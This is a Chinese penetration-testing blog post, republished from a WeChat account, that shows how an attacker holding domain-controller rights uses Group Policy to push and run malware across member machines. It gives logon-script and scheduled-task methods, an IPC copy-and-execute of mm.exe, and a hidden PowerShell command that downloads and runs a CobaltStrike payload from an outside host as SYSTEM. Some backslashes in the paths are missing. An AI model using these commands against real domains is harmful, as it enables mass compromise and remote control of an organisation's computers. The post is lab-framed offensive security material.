域渗透 - 域控使用组策略下发文件并执行

  • A+
所属分类:安全文章

本文将简单讲解在内网渗透中拿下域控的情况下,如何使用组策略批量下马。


利用前提:

拥有更改某组策略的权限或者域管权限


利用思路:

1、利用OU+启动脚本

2、利用计划任务

这里引用三好学生师傅的原话


根据不同情况,有以下两种利用思路:
1、新建组策略,创建计划任务实现远程执行
创建一个新的GPO并链接到对应的域备份GPO修改Backup.xmlgpreport.xml创建ScheduledTasks.xml还原GPO 强制客户端刷新策略清理操作痕迹第二步到第五步可以通过脚本直接实现2、修改已有组策略,替换计划任务
如果域控制器上已有策略并配置了计划任务不再需要注册,修改ScheduledTasks.xml就好


测试环境:

域控:windows server 2019

域成员机器:windows server 2016

攻击机:Kali Linux

测试工具:CobaltStrike 4.2


测试一

域成员登录时,执行域控提前部署好的bat脚本,通过此脚本,IPC连接到域控,copy文件或执行命令,在成员上执行。


首先新建OU:


域渗透 - 域控使用组策略下发文件并执行


然后在OU内新建用户:


域渗透 - 域控使用组策略下发文件并执行


然后打开组策略管理(gpmc.msc),右键组策略对象——新建


域渗透 - 域控使用组策略下发文件并执行


然后以此执行右键ADControl——编辑——用户配置——策略——windows设置——脚本——登录——显示文件——新建ADControl.bat


域渗透 - 域控使用组策略下发文件并执行


代码如下:


cmd /c calc


然后添加——浏览——选择ADControl.bat


域渗透 - 域控使用组策略下发文件并执行


然后右键OU——链接现有GPO——选择ADcontrol


域渗透 - 域控使用组策略下发文件并执行


然后刷新组策略


gpupdate /force


域渗透 - 域控使用组策略下发文件并执行


然后使用新建账户登录,成功执行calc


域渗透 - 域控使用组策略下发文件并执行


若是想要上马则利用IPC共享实现即可,代码如下


net use \192.168.2.100  [email protected] /user:[email protected]copy \192.168.2.100c$testmm.exe c:testcmd /c c:testmm.exenet use * /del /y


或使用powershell上线


域渗透 - 域控使用组策略下发文件并执行


测试二

利用计划任务来实现


首先创建GPO


new-gpo -name TestGPO


域渗透 - 域控使用组策略下发文件并执行


链接GPO


New-GPLink -Name TestGPO -Target 'dc=ssosec,dc=com'


域渗透 - 域控使用组策略下发文件并执行


修改GPO并添加即时任务

即时任务会在组策略同步的时候强制执行一次,组策略每90分钟自动同步一次。使用三好学生的脚本

https://github.com/3gstudent/Homework-of-Powershell/blob/master/New-GPOImmediateTask.ps1


New-GPOImmediateTask -TaskName Debugging -GPODisplayName TestGPO -SysPath '\WIN-2EQKFR3L6MF.ssosec.comsysvolssosec.com' -Command 'powershell.exe' -CommandArguments '-nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(''http://192.168.1.106:8022/a''))"'


域渗透 - 域控使用组策略下发文件并执行


这里顺带提一嘴GPO的一些知识,GPO默认路径是在:


\ssosec.comsysvolSSOSec.comPolicies


域渗透 - 域控使用组策略下发文件并执行


{6AC1786C-016F-11D2-945F-00C04fB984F9}对应Default Domain Controllers Policy

{31B2F340-016D-11D2-945F-00C04FB984F9}对应Default Domain Policy


其他的则是你自己新建的,计划任务的配置文件放在如下的地方,就是图中的xml文件


域渗透 - 域控使用组策略下发文件并执行


然后客户机强制刷新组策略,目标上线,且是system


域渗透 - 域控使用组策略下发文件并执行


参考文章:

https://redn3ck.github.io/2018/03/01/%E5%9F%9F%E6%B8%97%E9%80%8F-%E5%9F%9F%E6%8E%A7%E4%B8%8B%E5%8F%91%E6%96%87%E4%BB%B6%E5%B9%B6%E6%89%A7%E8%A1%8C%E8%BF%9C%E6%8E%A7/

https://blog.csdn.net/MS_Tony_Shu/article/details/93723432

https://blog.csdn.net/qq_41874930/article/details/108343156

https://3gstudent.github.io/backup-3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-%E5%88%A9%E7%94%A8GPO%E4%B8%AD%E7%9A%84%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1%E5%AE%9E%E7%8E%B0%E8%BF%9C%E7%A8%8B%E6%89%A7%E8%A1%8C/


     ▼
更多精彩推荐,请关注我们

域渗透 - 域控使用组策略下发文件并执行



本文始发于微信公众号(鸿鹄实验室):域渗透 - 域控使用组策略下发文件并执行

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: